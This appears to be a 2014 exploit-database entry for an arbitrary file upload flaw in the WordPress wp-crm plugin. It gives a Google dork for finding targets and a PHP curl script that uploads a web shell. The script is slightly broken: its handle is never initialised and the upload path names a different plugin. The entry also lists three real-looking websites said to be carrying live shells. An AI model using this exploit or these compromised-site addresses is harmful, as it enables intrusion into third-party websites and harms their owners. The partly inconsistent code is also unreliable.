WordPress wp-crm Plugin Arbitrary File Upload Vulnerability
| EKU-ID: 4115 | CVE: | OSVDB-ID: |
| Author: brunox | Published: 2014-06-30 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 4115 | CVE: | OSVDB-ID: |
| Author: brunox | Published: 2014-06-30 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
############################################################################################# # # Title : WordPress wp-crm Plugin Arbitrary File Upload Vulnerability # # # Author : X-Bruno # # # Date : 27/06/2014 # # # Facebook : http://www.facebook.com/Inj3ct.Bruno # # # # Email: brunox338@gmail.com # # # # Vendor : www.wordpress.org # # # #Googe Dork : inurl:/wp-content/plugins/wp-crm/ # # # # Tested on : Linux # # ############################################################################################# Exploit : upload shell/.php <?php $uploadfile="Bruno.php"; curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'folder'=>"/wordpress/wp-content/plugins/wp-property/third-party/uploadify/")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> ------------------------------- <?php phpinfo(); ?> ------------------------------- Shell Access ==== > http://localhost/wordpress/wp-content/plugins/wp-crm/third-party/uploadify/(shell_name.php) -------------------------------- Examples : (Live Shells) 1- http://www.transport9.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php 2- http://adbuzzler.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php 3- http://ourladyofthecape.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php ##################################################################### # Greeting : Toomy Jone , Injector Hacker , Dr.SHA6H , HunTerS - Team # #####################################################################